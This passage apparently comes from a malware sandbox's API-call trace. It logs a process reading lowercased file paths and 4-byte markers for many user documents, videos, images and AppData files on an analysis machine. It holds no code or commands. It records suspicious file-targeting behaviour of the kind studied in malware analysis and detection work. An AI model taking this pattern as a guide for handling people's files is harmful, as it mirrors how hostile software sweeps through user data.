_Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/kfCaijYE4JotJFgCVvZ.docx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/kfcaijye4jotjfgcvvz.docx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/kfcaijye4jotjfgcvvz.docx" [0085.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/kfcaijye4jotjfgcvvz.docx") returned 68 [0085.770] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.770] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.770] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.770] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/VWKCvzfj9FEO9nNP/MeiVQH73.jpg" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/meivqh73.jpg") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/meivqh73.jpg" [0085.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/meivqh73.jpg") returned 73 [0085.770] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.770] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.770] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.770] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/bGq5Sdc_j4Q1pN3G.mkv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/bgq5sdc_j4q1pn3g.mkv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/bgq5sdc_j4q1pn3g.mkv" [0085.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/bgq5sdc_j4q1pn3g.mkv") returned 63 [0085.770] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.771] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.771] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.771] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/I4z-zBSF9hnTkBaKIP/yCPZmKiRBkZdD83zh.pps" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/ycpzmkirbkzdd83zh.pps") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/ycpzmkirbkzdd83zh.pps" [0085.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/ycpzmkirbkzdd83zh.pps") returned 105 [0085.771] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.771] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.771] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.771] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/UprRnKOCaJ.swf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/uprrnkocaj.swf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/uprrnkocaj.swf" [0085.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/uprrnkocaj.swf") returned 66 [0085.771] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.771] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.771] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.771] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/9zD4.pptx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/9zd4.pptx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/9zd4.pptx" [0085.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/9zd4.pptx") returned 55 [0085.771] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.771] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.771] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.771] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/XAD6daCXJlfSNkrL.mkv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/xad6dacxjlfsnkrl.mkv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/xad6dacxjlfsnkrl.mkv" [0085.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/xad6dacxjlfsnkrl.mkv") returned 72 [0085.771] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.772] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.772] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.772] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/kEqRajwWgkVsR.bmp" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/keqrajwwgkvsr.bmp") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/keqrajwwgkvsr.bmp" [0085.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/keqrajwwgkvsr.bmp") returned 69 [0085.772] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.772] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.772] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.772] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/E1-SZDw/cTHtM1sTuuxWdzGs.swf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/cthtm1stuuxwdzgs.swf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/cthtm1stuuxwdzgs.swf" [0085.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/cthtm1stuuxwdzgs.swf") returned 71 [0085.772] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.772] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.772] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.772] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/IE86ieIkRrj2TcTdtHLN.flv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/ie86ieikrrj2tctdthln.flv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/ie86ieikrrj2tctdthln.flv" [0085.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/ie86ieikrrj2tctdthln.flv") returned 68 [0085.772] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.772] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.772] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.772] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/s%201xjKS5rgwiOStRv.flv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/s%201xjks5rgwiostrv.flv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/s%201xjks5rgwiostrv.flv" [0085.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/s%201xjks5rgwiostrv.flv") returned 66 [0085.772] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.773] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.773] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.773] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/I-vzXXaq.ppt" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/i-vzxxaq.ppt") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/i-vzxxaq.ppt" [0085.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/i-vzxxaq.ppt") returned 64 [0085.773] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.773] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.773] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.773] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/neiWqsqWJb.docx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/neiwqsqwjb.docx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/neiwqsqwjb.docx" [0085.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/neiwqsqwjb.docx") returned 61 [0085.773] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.773] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.773] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.773] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/bbUhdSEBOR_Wx0_Ly.flv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/bbuhdsebor_wx0_ly.flv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/bbuhdsebor_wx0_ly.flv" [0085.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/bbuhdsebor_wx0_ly.flv") returned 64 [0085.773] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.773] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.773] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.774] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/dC0kKKMref9xs.swf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/dc0kkkmref9xs.swf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/dc0kkkmref9xs.swf" [0085.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/dc0kkkmref9xs.swf") returned 60 [0085.774] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.774] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.774] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.774] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/2n_GtpyLH.odt" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/2n_gtpylh.odt") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/2n_gtpylh.odt" [0085.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/2n_gtpylh.odt") returned 59 [0085.774] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.774] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.774] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x180, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x180, lpOverlapped=0x0) returned 1 [0085.774] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/Z2LyObAsS%20shWl/TpxyvhqitSjWoNKMm/yWZ6bCkDGKeaDV/OhxNYKh_uFZ4.gif" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/ohxnykh_ufz4.gif") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/ohxnykh_ufz4.gif" [0085.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/ohxnykh_ufz4.gif") returned 120 [0085.774] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.774] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.774] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.774] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/3sC0z1bfBrLsq.ppt" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/3sc0z1bfbrlsq.ppt") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/3sc0z1bfbrlsq.ppt" [0085.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/3sc0z1bfbrlsq.ppt") returned 63 [0085.774] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.774] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.774] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.775] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/G5VE1YbcAHaUz0t.gif" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/g5ve1ybcahauz0t.gif") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/g5ve1ybcahauz0t.gif" [0085.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/g5ve1ybcahauz0t.gif") returned 71 [0085.775] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.775] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.775] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.775] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/VWKCvzfj9FEO9nNP/c9V5CWhsFouNZ.png" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/c9v5cwhsfounz.png") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/c9v5cwhsfounz.png" [0085.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/c9v5cwhsfounz.png") returned 78 [0085.775] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.775] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.775] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.775] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/lU_NzWrGi2SSxTfHhhg.swf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lu_nzwrgi2ssxtfhhhg.swf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lu_nzwrgi2ssxtfhhhg.swf" [0085.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lu_nzwrgi2ssxtfhhhg.swf") returned 66 [0085.775] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.775] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.775] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.775] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/kVgO2PS.odt" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/kvgo2ps.odt") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/kvgo2ps.odt" [0085.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/kvgo2ps.odt") returned 76 [0085.775] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.775] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.775] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.776] _strlwr (in: 